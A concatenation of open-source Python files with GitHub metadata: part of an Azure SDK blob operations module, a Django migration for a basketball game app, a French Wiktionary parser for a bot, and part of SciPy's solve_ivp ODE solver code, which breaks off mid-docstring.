        raise HttpResponseError(response=response, model=error)

    # Deserialize the response headers of interest for the caller.
    response_headers = {}
    response_headers['Content-Type']=self._deserialize('str', response.headers.get('Content-Type'))
    response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id'))
    response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
    response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
    response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))

    # Deserialize the XML body into the typed listing model.
    deserialized = self._deserialize('ListBlobsHierarchySegmentResponse', pipeline_response)

    if cls:
        return cls(pipeline_response, deserialized, response_headers)

    return deserialized

list_blob_hierarchy_segment.metadata = {'url': '/{containerName}'}  # type: ignore
async def get_account_info(
self,
**kwargs
) -> None:
"""Returns the sku name and account kind.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
restype = "account"
comp = "properties"
accept = "application/xml"
# Construct URL
url = self.get_account_info.metadata['url'] # type: ignore
path_format_arguments = {
'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['restype'] = self._serialize.query("restype", restype, 'str')
query_parameters['comp'] = self._serialize.query("comp", comp, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.StorageError, response)
raise HttpResponseError(response=response, model=error)
response_headers = {}
response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id'))
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
response_headers['x-ms-sku-name']=self._deserialize('str', response.headers.get('x-ms-sku-name'))
response_headers['x-ms-account-kind']=self._deserialize('str', response.headers.get('x-ms-account-kind'))
if cls:
return cls(pipeline_response, None, response_headers)
get_account_info.metadata = {'url': '/{containerName}'} # type: ignore
| {
"content_hash": "fdc85b581bfd68675f9f45bbfdd550f5",
"timestamp": "",
"source": "github",
"line_count": 1456,
"max_line_length": 174,
"avg_line_length": 57.559065934065934,
"alnum_prop": 0.6608954012839177,
"repo_name": "Azure/azure-sdk-for-python",
"id": "ed32bc96241b6d38d202052291f52153f05af79e",
"size": "84273",
"binary": false,
"copies": "2",
"ref": "refs/heads/main",
"path": "sdk/eventhub/azure-eventhub-checkpointstoreblob/azure/eventhub/extensions/checkpointstoreblob/_vendor/storage/blob/_generated/aio/operations/_container_operations.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1224"
},
{
"name": "Bicep",
"bytes": "24196"
},
{
"name": "CSS",
"bytes": "6089"
},
{
"name": "Dockerfile",
"bytes": "4892"
},
{
"name": "HTML",
"bytes": "12058"
},
{
"name": "JavaScript",
"bytes": "8137"
},
{
"name": "Jinja",
"bytes": "10377"
},
{
"name": "Jupyter Notebook",
"bytes": "272022"
},
{
"name": "PowerShell",
"bytes": "518535"
},
{
"name": "Python",
"bytes": "715484989"
},
{
"name": "Shell",
"bytes": "3631"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial schema for the ``game`` app.

    Creates the ``Game``, ``Recorder``, ``Score``, ``Season`` and ``Timer``
    models, then wires the ``Game`` foreign keys that point back into this
    app (added last because the target models must exist first).
    Depends on the ``team`` app for the ``Team`` and ``Player`` models.
    """
    initial = True
    dependencies = [
        ('team', '0004_remove_player_active'),
    ]
    operations = [
        # A single match between a host and a guest team.
        migrations.CreateModel(
            name='Game',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('host_name', models.CharField(blank=True, max_length=128, null=True)),
                ('guest_name', models.CharField(blank=True, max_length=128, null=True)),
                ('host_score', models.IntegerField(blank=True, default=0, null=True)),
                ('guest_score', models.IntegerField(blank=True, default=0, null=True)),
                ('start_time', models.DateTimeField(blank=True, null=True)),
                ('end_time', models.DateTimeField(blank=True, null=True)),
                ('field', models.CharField(blank=True, max_length=24, null=True)),
                ('created', models.DateTimeField(auto_now_add=True)),
                ('status', models.CharField(choices=[('p', 'Pending'), ('f', 'Finished')], default='p', max_length=1)),
                ('guest', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='+', to='team.Team')),
                ('host', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='+', to='team.Team')),
            ],
            options={
                'db_table': 'game',
            },
        ),
        # Person recording the score sheet for a team in a given year.
        migrations.CreateModel(
            name='Recorder',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(blank=True, max_length=32, null=True)),
                ('year', models.CharField(max_length=4)),
                ('team', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='team.Team')),
            ],
            options={
                'db_table': 'recorder',
            },
        ),
        # Per-player statistics line for one game.
        migrations.CreateModel(
            name='Score',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('player_number', models.IntegerField(blank=True, default=0, null=True)),
                ('player_name', models.CharField(blank=True, max_length=64, null=True)),
                ('status', models.CharField(choices=[('Y', 'Starter'), ('S', 'Substitutes'), ('NP', 'Not Play'), ('NA', 'N/A')], default='NA', max_length=2)),
                ('personal_foul', models.IntegerField(blank=True, default=0, null=True)),
                ('free_throw', models.IntegerField(default=0)),
                ('field_goal', models.IntegerField(default=0)),
                ('three_point', models.IntegerField(default=0)),
                ('assists', models.IntegerField(default=0)),
                ('steals', models.IntegerField(default=0)),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('game', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='game.Game')),
                ('player', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='team.Player')),
            ],
            options={
                'ordering': ['player__number'],
                'db_table': 'score',
            },
        ),
        # A season groups games; identified by name/address/year.
        migrations.CreateModel(
            name='Season',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(blank=True, max_length=64, null=True)),
                ('address', models.CharField(blank=True, max_length=128, null=True)),
                ('year', models.CharField(max_length=4)),
            ],
            options={
                'db_table': 'season',
            },
        ),
        # Person running the game clock for a team in a given year.
        migrations.CreateModel(
            name='Timer',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(blank=True, max_length=32, null=True)),
                ('year', models.CharField(max_length=4)),
                ('team', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='team.Team')),
            ],
            options={
                'db_table': 'timer',
            },
        ),
        # Foreign keys from Game into models created above.
        migrations.AddField(
            model_name='game',
            name='recorder',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='game.Recorder'),
        ),
        migrations.AddField(
            model_name='game',
            name='season',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='game.Season'),
        ),
        migrations.AddField(
            model_name='game',
            name='timer',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='game.Timer'),
        ),
    ]
| {
"content_hash": "5c487a2d677cdea2ed1be262ef78db81",
"timestamp": "",
"source": "github",
"line_count": 109,
"max_line_length": 158,
"avg_line_length": 48.055045871559635,
"alnum_prop": 0.5435280641466208,
"repo_name": "vollov/lotad",
"id": "0cf20c5999fe989a00ab85ba2b20431941c21885",
"size": "5309",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "game/migrations/0001_initial.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "2064"
},
{
"name": "HTML",
"bytes": "30932"
},
{
"name": "JavaScript",
"bytes": "328457"
},
{
"name": "Python",
"bytes": "119806"
},
{
"name": "Shell",
"bytes": "312"
}
],
"symlink_target": ""
} |
import re
import pywikibot
from api.model.word import Entry
from .base import WiktionaryProcessor
from .base import stripwikitext
class FRWiktionaryProcessor(WiktionaryProcessor):
    """Entry processor for the French-language Wiktionary.

    Parses page wikitext to extract per-language dictionary entries and the
    translations listed with ``{{trad+|..}}``/``{{trad-|..}}`` templates,
    mapping French part-of-speech names to their Malagasy abbreviations.
    """
    @property
    def language(self):
        """Language code of the wiki this processor handles."""
        return 'fr'
    def __init__(self, test=False, verbose=False):
        super(FRWiktionaryProcessor, self).__init__(test=test, verbose=verbose)
        self.verbose = verbose
        self.text_set = False
        self.content = None
        # French part-of-speech name -> Malagasy POS abbreviation.
        self.postran = {
            'verbe': 'mat',
            'adjectif': 'mpam',
            'nom': 'ana',
            'adverbe': 'tamb',
            'pronom': 'solo-ana',
            'préfixe': 'tovona',
            'suffixe': 'tovana'
        }
    def retrieve_translations(self):
        """Extract translations from ``{{trad+|lang|word}}`` templates.

        The reference part of speech and definition are taken from the first
        French entry returned by :meth:`getall`; ``'ana'`` (noun) is used as
        a fallback when none is found.

        :return: sorted list of :class:`Entry`, one per translation.
        """
        retcontent = []
        regex = r'\{\{trad[\+\-]+?\|([A-Za-z]{2,3})\|(.*?)\}\}'
        part_of_speech = 'ana'
        definition = ""
        # Use the page's French entry as the reference POS/definition.
        for entry in self.getall():
            if entry.language == 'fr':
                if entry.part_of_speech in self.postran:
                    part_of_speech = self.postran[entry.part_of_speech]
                definition = entry.entry
                break
        for langcode, word in re.findall(regex, self.content):
            # Skip malformed translations containing punctuation.
            # (Bug fix: the previous loop-with-continue only continued the
            # inner character loop, so nothing was ever skipped.)
            if any(ch in word for ch in "();:.,"):
                continue
            entree = str(word)
            # "{{trad|xx|word|param=...}}" may carry extra template
            # parameters; keep only the word itself.
            if '|' in word:
                entree = entree.split("|")[0]
            e = Entry(
                entry=entree,
                part_of_speech=part_of_speech,
                language=langcode,
                definitions=[definition.strip()]
            )
            retcontent.append(e)
        try:
            retcontent.sort()
        except UnicodeError:
            pass
        return retcontent
    def getall(self, keepNativeEntries=False, **kw):
        """Return every language section of the page as ``Entry`` objects.

        Scans the wikitext for ``{{S|<pos>|<lang>}}`` section headers and
        extracts the first definition line (``# ...``) that follows each.
        Formatting: [(POS, lang, definition), ...] wrapped in ``Entry``.

        :param keepNativeEntries: unused; kept for interface compatibility.
        """
        if self.Page is not None:
            assert isinstance(self.Page, pywikibot.Page), self.Page.__class__
        items = []
        if self.content is None:
            raise Exception(
                "self.page tsy voafaritra. self.process() tsy mbola nantsoina")
        ct_content = self.content
        for lang in re.findall(
                '{{S\\|([a-z]+)\\|([a-z]{2,3})',
                self.content):
            # Locate the section start and the start of the next language
            # section to bound the definition search.
            d1 = ct_content.find("{{S|%s|%s" % lang)
            d2 = ct_content.find("=={{langue|", d1) + 1
            if not d2:
                d2 = ct_content.find("== {{langue|", d1 + 50) + 1
            d_ptr = ct_content.find("=={{langue|%s" % lang[1], d1) + 1
            if not d_ptr:
                d_ptr = ct_content.find("== {{langue|%s" % lang[1], d1) + 1
            if d2 > d1:
                definition = ct_content[d1:d2]
            else:
                definition = ct_content[d1:]
            try:
                # First "# ..." line is the definition; strip wiki links.
                definition = definition.split('\n# ')[1]
                definition = re.sub(
                    "\\[\\[(.*)#(.*)\\|?[.*]?\\]?\\]?", "\\1", definition)
            except IndexError:
                ct_content = ct_content[d_ptr:]
                continue
            ct_content = ct_content[d_ptr:]
            if definition.find('\n') + 1:
                definition = definition[:definition.find('\n')]
            definition = stripwikitext(definition)
            if not definition:
                ct_content = ct_content[d_ptr:]
                continue
            pos = frpos = lang[0].strip()  # POS
            if frpos in self.postran:
                pos = self.postran[frpos]
            i = Entry(
                entry=self.title,
                part_of_speech=pos,
                language=lang[1].strip(),
                definitions=[definition.strip()]
            )
            items.append(i)
        return items
| {
"content_hash": "5d0bfa82eb0186f8492b8f4011691918",
"timestamp": "",
"source": "github",
"line_count": 129,
"max_line_length": 90,
"avg_line_length": 32.02325581395349,
"alnum_prop": 0.47615589445654805,
"repo_name": "radomd92/botjagwar",
"id": "c742a6261e149f90fcdaed52902c8160a0463106",
"size": "4148",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "api/entryprocessor/wiki/fr.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "PLpgSQL",
"bytes": "28427"
},
{
"name": "Python",
"bytes": "657399"
},
{
"name": "Shell",
"bytes": "3709"
}
],
"symlink_target": ""
} |
import inspect
import numpy as np
from .bdf import BDF
from .radau import Radau
from .rk import RK23, RK45, DOP853
from .lsoda import LSODA
from scipy.optimize import OptimizeResult
from .common import EPS, OdeSolution
from .base import OdeSolver
# Registry of solver classes accepted by `solve_ivp`'s ``method`` argument.
METHODS = {'RK23': RK23,
           'RK45': RK45,
           'DOP853': DOP853,
           'Radau': Radau,
           'BDF': BDF,
           'LSODA': LSODA}
# Human-readable termination messages keyed by solver exit status.
MESSAGES = {0: "The solver successfully reached the end of the integration interval.",
            1: "A termination event occurred."}
class OdeResult(OptimizeResult):
    """Result container returned by `solve_ivp`.

    Provides attribute-style access to the fields documented in the
    Returns section of `solve_ivp`.
    """
    pass
def prepare_events(events):
    """Normalize the ``events`` argument of `solve_ivp`.

    A single callable is wrapped into a one-element tuple. Each event's
    ``terminal`` and ``direction`` attributes are collected into arrays,
    defaulting to ``False`` and ``0`` when absent.
    """
    if callable(events):
        events = (events,)
    if events is None:
        return None, None, None
    n_events = len(events)
    is_terminal = np.empty(n_events, dtype=bool)
    direction = np.empty(n_events)
    for idx, event in enumerate(events):
        is_terminal[idx] = getattr(event, 'terminal', False)
        direction[idx] = getattr(event, 'direction', 0)
    return events, is_terminal, direction
def solve_event_equation(event, sol, t_old, t):
    """Solve ``event(t, y(t)) = 0`` for ``t`` within ``[t_old, t]``.

    ``y(t)`` is supplied by an ODE solver's dense-output interpolant. The
    root is located with `scipy.optimize.brentq` using xtol=atol=4*EPS.

    Parameters
    ----------
    event : callable
        Event function ``event(t, y)``.
    sol : callable
        Interpolant ``sol(t)`` valid between `t_old` and `t`.
    t_old, t : float
        Previous and new values of time; used as the bracketing interval.

    Returns
    -------
    root : float
        Location of the zero crossing.
    """
    from scipy.optimize import brentq

    def objective(time):
        return event(time, sol(time))

    return brentq(objective, t_old, t, xtol=4 * EPS, rtol=4 * EPS)
def handle_events(sol, events, active_events, is_terminal, t_old, t):
    """Locate the roots of triggered events and apply termination rules.

    Parameters
    ----------
    sol : DenseOutput
        Interpolant ``sol(t)`` valid between `t_old` and `t`.
    events : list of callables, length n_events
        Event functions with signatures ``event(t, y)``.
    active_events : ndarray
        Indices of events which occurred during the last step.
    is_terminal : ndarray, shape (n_events,)
        Which events are terminal.
    t_old, t : float
        Previous and new values of time.

    Returns
    -------
    root_indices : ndarray
        Indices of events whose roots lie before a possible termination.
    roots : ndarray
        Values of t at which the events occurred.
    terminate : bool
        Whether a terminal event occurred.
    """
    roots = np.asarray([
        solve_event_equation(events[idx], sol, t_old, t)
        for idx in active_events
    ])
    terminate = bool(np.any(is_terminal[active_events]))
    if terminate:
        # Order the roots chronologically along the integration direction.
        order = np.argsort(roots) if t > t_old else np.argsort(-roots)
        active_events = active_events[order]
        roots = roots[order]
        # Keep only the events up to and including the first terminal one.
        first_terminal = np.nonzero(is_terminal[active_events])[0][0]
        active_events = active_events[:first_terminal + 1]
        roots = roots[:first_terminal + 1]
    return active_events, roots, terminate
def find_active_events(g, g_new, direction):
    """Return indices of events that triggered during the last step.

    An event triggers when its value changes sign between two points and
    the sign change matches the event's requested crossing direction.

    Parameters
    ----------
    g, g_new : array_like, shape (n_events,)
        Event values at the previous and the current point.
    direction : ndarray, shape (n_events,)
        Positive for -/+ crossings only, negative for +/- crossings only,
        zero for either direction (see `solve_ivp`).

    Returns
    -------
    active_events : ndarray
        Indices of the events that triggered.
    """
    g = np.asarray(g)
    g_new = np.asarray(g_new)
    crossed_up = (g <= 0) & (g_new >= 0)
    crossed_down = (g >= 0) & (g_new <= 0)
    triggered = ((direction > 0) & crossed_up
                 | (direction < 0) & crossed_down
                 | (direction == 0) & (crossed_up | crossed_down))
    return np.nonzero(triggered)[0]
def solve_ivp(fun, t_span, y0, method='RK45', t_eval=None, dense_output=False,
              events=None, vectorized=False, args=None, **options):
    """Solve an initial value problem for a system of ODEs.
    This function numerically integrates a system of ordinary differential
    equations given an initial value::
        dy / dt = f(t, y)
        y(t0) = y0
    Here t is a 1-D independent variable (time), y(t) is an
    N-D vector-valued function (state), and an N-D
    vector-valued function f(t, y) determines the differential equations.
    The goal is to find y(t) approximately satisfying the differential
    equations, given an initial value y(t0)=y0.
    Some of the solvers support integration in the complex domain, but note
    that for stiff ODE solvers, the right-hand side must be
    complex-differentiable (satisfy Cauchy-Riemann equations [11]_).
    To solve a problem in the complex domain, pass y0 with a complex data type.
    Another option always available is to rewrite your problem for real and
    imaginary parts separately.
    Parameters
    ----------
    fun : callable
        Right-hand side of the system. The calling signature is ``fun(t, y)``.
        Here `t` is a scalar, and there are two options for the ndarray `y`:
        It can either have shape (n,); then `fun` must return array_like with
        shape (n,). Alternatively, it can have shape (n, k); then `fun`
        must return an array_like with shape (n, k), i.e., each column
        corresponds to a single column in `y`. The choice between the two
        options is determined by `vectorized` argument (see below). The
        vectorized implementation allows a faster approximation of the Jacobian
        by finite differences (required for stiff solvers).
    t_span : 2-tuple of floats
        Interval of integration (t0, tf). The solver starts with t=t0 and
        integrates until it reaches t=tf.
    y0 : array_like, shape (n,)
        Initial state. For problems in the complex domain, pass `y0` with a
        complex data type (even if the initial value is purely real).
    method : string or `OdeSolver`, optional
        Integration method to use:
            * 'RK45' (default): Explicit Runge-Kutta method of order 5(4) [1]_.
              The error is controlled assuming accuracy of the fourth-order
              method, but steps are taken using the fifth-order accurate
              formula (local extrapolation is done). A quartic interpolation
              polynomial is used for the dense output [2]_. Can be applied in
              the complex domain.
            * 'RK23': Explicit Runge-Kutta method of order 3(2) [3]_. The error
              is controlled assuming accuracy of the second-order method, but
              steps are taken using the third-order accurate formula (local
              extrapolation is done). A cubic Hermite polynomial is used for the
              dense output. Can be applied in the complex domain.
            * 'DOP853': Explicit Runge-Kutta method of order 8 [13]_.
              Python implementation of the "DOP853" algorithm originally
              written in Fortran [14]_. A 7-th order interpolation polynomial
              accurate to 7-th order is used for the dense output.
              Can be applied in the complex domain.
            * 'Radau': Implicit Runge-Kutta method of the Radau IIA family of
              order 5 [4]_. The error is controlled with a third-order accurate
              embedded formula. A cubic polynomial which satisfies the
              collocation conditions is used for the dense output.
            * 'BDF': Implicit multi-step variable-order (1 to 5) method based
              on a backward differentiation formula for the derivative
              approximation [5]_. The implementation follows the one described
              in [6]_. A quasi-constant step scheme is used and accuracy is
              enhanced using the NDF modification. Can be applied in the
              complex domain.
            * 'LSODA': Adams/BDF method with automatic stiffness detection and
              switching [7]_, [8]_. This is a wrapper of the Fortran solver
              from ODEPACK.
        Explicit Runge-Kutta methods ('RK23', 'RK45', 'DOP853') should be used
        for non-stiff problems and implicit methods ('Radau', 'BDF') for
        stiff problems [9]_. Among Runge-Kutta methods, 'DOP853' is recommended
        for solving with high precision (low values of `rtol` and `atol`).
        If not sure, first try to run 'RK45'. If it makes unusually many
        iterations, diverges, or fails, your problem is likely to be stiff and
        you should use 'Radau' or 'BDF'. 'LSODA' can also be a good universal
        choice, but it might be somewhat less convenient to work with as it
        wraps old Fortran code.
        You can also pass an arbitrary class derived from `OdeSolver` which
        implements the solver.
    t_eval : array_like or None, optional
        Times at which to store the computed solution, must be sorted and lie
        within `t_span`. If None (default), use points selected by the solver.
    dense_output : bool, optional
        Whether to compute a continuous solution. Default is False.
    events : callable, or list of callables, optional
        Events to track. If None (default), no events will be tracked.
        Each event occurs at the zeros of a continuous function of time and
        state. Each function must have the signature ``event(t, y)`` and return
        a float. The solver will find an accurate value of `t` at which
        ``event(t, y(t)) = 0`` using a root-finding algorithm. By default, all
        zeros will be found. The solver looks for a sign change over each step,
        so if multiple zero crossings occur within one step, events may be
        missed. Additionally each `event` function might have the following
        attributes:
            terminal: bool, optional
                Whether to terminate integration if this event occurs.
                Implicitly False if not assigned.
            direction: float, optional
                Direction of a zero crossing. If `direction` is positive,
                `event` will only trigger when going from negative to positive,
                and vice versa if `direction` is negative. If 0, then either
                direction will trigger event. Implicitly 0 if not assigned.
        You can assign attributes like ``event.terminal = True`` to any
        function in Python.
    vectorized : bool, optional
        Whether `fun` is implemented in a vectorized fashion. Default is False.
    args : tuple, optional
        Additional arguments to pass to the user-defined functions. If given,
        the additional arguments are passed to all user-defined functions.
        So if, for example, `fun` has the signature ``fun(t, y, a, b, c)``,
        then `jac` (if given) and any event functions must have the same
        signature, and `args` must be a tuple of length 3.
    options
        Options passed to a chosen solver. All options available for already
        implemented solvers are listed below.
    first_step : float or None, optional
        Initial step size. Default is `None` which means that the algorithm
        should choose.
    max_step : float, optional
        Maximum allowed step size. Default is np.inf, i.e., the step size is not
        bounded and determined solely by the solver.
    rtol, atol : float or array_like, optional
        Relative and absolute tolerances. The solver keeps the local error
        estimates less than ``atol + rtol * abs(y)``. Here `rtol` controls a
        relative accuracy (number of correct digits). But if a component of `y`
        is approximately below `atol`, the error only needs to fall within
        the same `atol` threshold, and the number of correct digits is not
        guaranteed. If components of y have different scales, it might be
        beneficial to set different `atol` values for different components by
        passing array_like with shape (n,) for `atol`. Default values are
        1e-3 for `rtol` and 1e-6 for `atol`.
    jac : array_like, sparse_matrix, callable or None, optional
        Jacobian matrix of the right-hand side of the system with respect
        to y, required by the 'Radau', 'BDF' and 'LSODA' method. The
        Jacobian matrix has shape (n, n) and its element (i, j) is equal to
        ``d f_i / d y_j``. There are three ways to define the Jacobian:
            * If array_like or sparse_matrix, the Jacobian is assumed to
              be constant. Not supported by 'LSODA'.
            * If callable, the Jacobian is assumed to depend on both
              t and y; it will be called as ``jac(t, y)``, as necessary.
              For 'Radau' and 'BDF' methods, the return value might be a
              sparse matrix.
            * If None (default), the Jacobian will be approximated by
              finite differences.
        It is generally recommended to provide the Jacobian rather than
        relying on a finite-difference approximation.
    jac_sparsity : array_like, sparse matrix or None, optional
        Defines a sparsity structure of the Jacobian matrix for a finite-
        difference approximation. Its shape must be (n, n). This argument
        is ignored if `jac` is not `None`. If the Jacobian has only few
        non-zero elements in *each* row, providing the sparsity structure
        will greatly speed up the computations [10]_. A zero entry means that
        a corresponding element in the Jacobian is always zero. If None
        (default), the Jacobian is assumed to be dense.
        Not supported by 'LSODA', see `lband` and `uband` instead.
    lband, uband : int or None, optional
        Parameters defining the bandwidth of the Jacobian for the 'LSODA'
        method, i.e., ``jac[i, j] != 0 only for i - lband <= j <= i + uband``.
        Default is None. Setting these requires your jac routine to return the
        Jacobian in the packed format: the returned array must have ``n``
        columns and ``uband + lband + 1`` rows in which Jacobian diagonals are
        written. Specifically ``jac_packed[uband + i - j , j] = jac[i, j]``.
        The same format is used in `scipy.linalg.solve_banded` (check for an
        illustration). These parameters can be also used with ``jac=None`` to
        reduce the number of Jacobian elements estimated by finite differences.
    min_step : float, optional
        The minimum allowed step size for 'LSODA' method.
        By default `min_step` is zero.
    Returns
    -------
    Bunch object with the following fields defined:
    t : ndarray, shape (n_points,)
        Time points.
    y : ndarray, shape (n, n_points)
        Values of the solution at `t`.
    sol : `OdeSolution` or None
        Found solution as `OdeSolution` instance; None if `dense_output` was
        set to False.
    t_events : list of ndarray or None
        Contains for each event type a list of arrays at which an event of
        that type event was detected. None if `events` was None.
    y_events : list of ndarray or None
        For each value of `t_events`, the corresponding value of the solution.
        None if `events` was None.
    nfev : int
        Number of evaluations of the right-hand side.
    njev : int
        Number of evaluations of the Jacobian.
    nlu : int
        Number of LU decompositions.
    status : int
        Reason for algorithm termination:
            * -1: Integration step failed.
            * 0: The solver successfully reached the end of `tspan`.
            * 1: A termination event occurred.
    message : string
        Human-readable description of the termination reason.
    success : bool
        True if the solver reached the interval end or a termination event
        occurred (``status >= 0``).
    References
    ----------
    .. [1] J. R. Dormand, P. J. Prince, "A family of embedded Runge-Kutta
           formulae", Journal of Computational and Applied Mathematics, Vol. 6,
           No. 1, pp. 19-26, 1980.
    .. [2] L. W. Shampine, "Some Practical Runge-Kutta Formulas", Mathematics
           of Computation,, Vol. 46, No. 173, pp. 135-150, 1986.
    .. [3] P. Bogacki, L.F. Shampine, "A 3(2) Pair of Runge-Kutta Formulas",
           Appl. Math. Lett. Vol. 2, No. 4. pp. 321-325, 1989.
    .. [4] E. Hairer, G. Wanner, "Solving Ordinary Differential Equations II:
           Stiff and Differential-Algebraic Problems", Sec. IV.8.
    .. [5] `Backward Differentiation Formula
            <https://en.wikipedia.org/wiki/Backward_differentiation_formula>`_
            on Wikipedia.
    .. [6] L. F. Shampine, M. W. Reichelt, "THE MATLAB ODE SUITE", SIAM J. SCI.
           COMPUTE., Vol. 18, No. 1, pp. 1-22, January 1997.
    .. [7] A. C. Hindmarsh, "ODEPACK, A Systematized Collection of ODE
           Solvers," IMACS Transactions on Scientific Computation, Vol 1.,
           pp. 55-64, 1983.
    .. [8] L. Petzold, "Automatic selection of methods for solving stiff and
           nonstiff systems of ordinary differential equations", SIAM Journal
           on Scientific and Statistical Computing, Vol. 4, No. 1, pp. 136-148,
           1983.
    .. [9] `Stiff equation <https://en.wikipedia.org/wiki/Stiff_equation>`_ on
           Wikipedia.
    .. [10] A. Curtis, M. J. D. Powell, and J. Reid, "On the estimation of
            sparse Jacobian matrices", Journal of the Institute of Mathematics
            and its Applications, 13, pp. 117-120, 1974.
    .. [11] `Cauchy-Riemann equations
             <https://en.wikipedia.org/wiki/Cauchy-Riemann_equations>`_ on
             Wikipedia.
    .. [12] `Lotka-Volterra equations
            <https://en.wikipedia.org/wiki/Lotka%E2%80%93Volterra_equations>`_
            on Wikipedia.
    .. [13] E. Hairer, S. P. Norsett G. Wanner, "Solving Ordinary Differential
            Equations I: Nonstiff Problems", Sec. II.
    .. [14] `Page with original Fortran code of DOP853
            <http://www.unige.ch/~hairer/software.html>`_.
    Examples
    --------
    Basic exponential decay showing automatically chosen time points.
    >>> from scipy.integrate import solve_ivp
    >>> def exponential_decay(t, y): return -0.5 * y
    >>> sol = solve_ivp(exponential_decay, [0, 10], [2, 4, 8])
    >>> print(sol.t)
    [ 0.          0.11487653  1.26364188  3.06061781  4.81611105  6.57445806
      8.33328988 10.        ]
    >>> print(sol.y)
    [[2.         1.88836035 1.06327177 0.43319312 0.18017253 0.07483045
      0.03107158 0.01350781]
     [4.         3.7767207  2.12654355 0.86638624 0.36034507 0.14966091
      0.06214316 0.02701561]
     [8.         7.5534414  4.25308709 1.73277247 0.72069014 0.29932181
      0.12428631 0.05403123]]
    Specifying points where the solution is desired.
    >>> sol = solve_ivp(exponential_decay, [0, 10], [2, 4, 8],
    ...                 t_eval=[0, 1, 2, 4, 10])
    >>> print(sol.t)
    [ 0  1  2  4 10]
    >>> print(sol.y)
    [[2.         1.21305369 0.73534021 0.27066736 0.01350938]
     [4.         2.42610739 1.47068043 0.54133472 0.02701876]
     [8.         4.85221478 2.94136085 1.08266944 0.05403753]]
    Cannon fired upward with terminal event upon impact. The ``terminal`` and
    ``direction`` fields of an event are applied by monkey patching a function.
    Here ``y[0]`` is position and ``y[1]`` is velocity. The projectile starts
    at position 0 with velocity +10. Note that the integration never reaches
    t=100 because the event is terminal.
    >>> def upward_cannon(t, y): return [y[1], -0.5]
    >>> def hit_ground(t, y): return y[0]
    >>> hit_ground.terminal = True
    >>> hit_ground.direction = -1
    >>> sol = solve_ivp(upward_cannon, [0, 100], [0, 10], events=hit_ground)
    >>> print(sol.t_events)
    [array([40.])]
    >>> print(sol.t)
    [0.00000000e+00 9.99900010e-05 1.09989001e-03 1.10988901e-02
     1.11088891e-01 1.11098890e+00 1.11099890e+01 4.00000000e+01]
    Use `dense_output` and `events` to find position, which is 100, at the apex
    of the cannonball's trajectory. Apex is not defined as terminal, so both
    apex and hit_ground are found. There is no information at t=20, so the sol
    attribute is used to evaluate the solution. The sol attribute is returned
    by setting ``dense_output=True``. Alternatively, the `y_events` attribute
    can be used to access the solution at the time of the event.
    >>> def apex(t, y): return y[1]
    >>> sol = solve_ivp(upward_cannon, [0, 100], [0, 10],
    ...                 events=(hit_ground, apex), dense_output=True)
    >>> print(sol.t_events)
    [array([40.]), array([20.])]
    >>> print(sol.t)
    [0.00000000e+00 9.99900010e-05 1.09989001e-03 1.10988901e-02
     1.11088891e-01 1.11098890e+00 1.11099890e+01 4.00000000e+01]
    >>> print(sol.sol(sol.t_events[1][0]))
    [100.   0.]
    >>> print(sol.y_events)
    [array([[-5.68434189e-14, -1.00000000e+01]]), array([[1.00000000e+02, 1.77635684e-15]])]
    As an example of a system with additional parameters, we'll implement
    the Lotka-Volterra equations [12]_.
    >>> def lotkavolterra(t, z, a, b, c, d):
    ...     x, y = z
    ...     return [a*x - b*x*y, -c*y + d*x*y]
    ...
    We pass in the parameter values a=1.5, b=1, c=3 and d=1 with the `args`
    argument.
